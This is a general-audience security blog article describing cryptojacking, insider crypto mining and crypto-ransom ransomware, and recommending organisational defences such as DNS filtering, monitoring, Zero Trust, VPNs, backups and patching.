Profile of a Cybercriminal: Cryptocurrency Attacks

It’s true that data has value – just look at Google and Facebook’s business models – but blockchain and cryptocurrency take this idea literally. Cryptocurrency is a literal term because for its hordes of users, cryptography fulfills many of the characteristics that are required to define a “currency”, such as verification of ownership and transferability. Data’s value, on the other hand, comes from the information it holds.
The cryptocurrency model has worked so far, and so naturally, people want to steal it as much as they do data or paper money. Metaphorically, hackers might perpetrate a smash and grab job to steal an organization’s data, but cryptocurrency can sometimes involve more subtle attacks of a different kind – even if the company doesn’t have any cryptocurrency in the first place. Learning to recognize these attacks and others is vital for achieving a proper security posture.

A Blockchain Breed of Cyber Threat

Thanks to blockchain’s unique style of decentralized networking, companies will encounter a new type of attack that isn’t the outright theft of data, a DDoS attack, or something similarly brash. It revolves around the core idea of decentralization that defines blockchain:  that computing power needed to serve users of blockchain websites or apps isn’t generated by a server on the grid. Instead, it’s shared between participants – ideally regular people who use their own computers to support the network.
But hackers exist to turn innovations into weapons. They’ve begun designing attacks that hijack remote PCs to do this, even corporate endpoints, and these attacks connect affected PCs to the blockchain, enslaving them in service of the chain. Crypto mining scams steal a small, nearly untraceable amount of CPU power – even from an employee’s mobile device – and essentially donate it to a blockchain that then rewards the hacker with cryptocurrencies that are then sent to their wallet.
Employees don’t even have to download anything – merely browsing the wrong website is enough. The popular CoinHive program, for example, can steal power from tens of thousands of PCs at once, and stays active even when users close their browser windows. Once a person lands on an infected website, it opens a tiny window hidden under the Start icon on the Windows OS desktop, so CPU power continues to be siphoned off even if the main window is closed. 
For IT teams looking to defend against drive-by crypto mining, it is possible with a two-pronged approach that uses both DNS filtering and advanced network monitoring utilities. The first line of defense is the DNS filter, which can proactively block sites that are known to be infected or those likely to be (using “bitcoin” as a blacklisting keyword for instance). Monitoring can then keep a close eye on bandwidth usage over the network, ensuring that all network bandwidth is being used for the company’s benefit. 

Crypto Scam Defenses Combine Old and New

In a reversal, attacks might be perpetrated from your network and not against it. An employee might mine on his or her company laptop, or if they were especially malicious, use company resources like the website to purposely infect visitors’ or users’ PCs to mine coins. This may have been the case with popular tech support tool LiveHelpNow, a widget which was installed on thousands of customers’ networks to provide their users with easy access to support – but also secretly provided one malicious hacker with a personal stash of Monero coins.
The Zero Trust security approach, achievable with software-defined networking tools, contains elements that would help identify strange network behavior but also institute least-privilege permissions to employees. These would filter who gets access to specific resources on the network. If LiveHelpNow had a rogue employee compromising its product, perhaps limiting access would have stopped them from sneaking in code that affected customers.
For organizations, it’s also important to remember that not all cryptocurrency attacks are this subtle theft of processing power, there are also the more noticeable and devastating network breaches like those meant to steal data. Some of the biggest ransomware attacks infiltrate the network and encrypt important files. They make themselves known by demanding a ransom in cryptocurrency to unlock access to the files, but a classic cybersecurity defense is effective against these events: firewalls, backups, and traffic encryption.
Ransomware can easily make its way into the network when a remote employee connects to resources on an unmanaged device or through an exposed Wi-Fi connection, so enforcing VPN use is bare minimum. Users shouldn’t be able to access resources without encryption, and firewalls are helpful in identifying suspicious traffic and deterring it. Finally, regular backups and patching go a long way to making ransomware attacks harmless – backups mean that data ransoming is pointless, while patching prevents the biggest OS exploits much like with the bitcoin-rich WannaCry worm, which took advantage of weaknesses in Windows 7 and 10.

A Blockchain Re-education

Only a comprehensive security model, one that’s classically equipped but updated with new training against its new foe, is capable of claiming confidence against cryptocurrency scams. From new types of attacks to familiar ones that have an alternate purpose, organizations should ideally go for a multilayered approach in order to put their concerns behind them. Educating employees, as it is with non-crypto attacks, is vital as well.
The decentralizing ideas that define cryptocurrency are all about empowering individuals, but unfortunately, the wrong individuals can feel empowered as well. It’s useful to remind employees how to resist temptation and improve their habits, and also to prepare networks for a younger generation of attacks that manipulate them in new ways.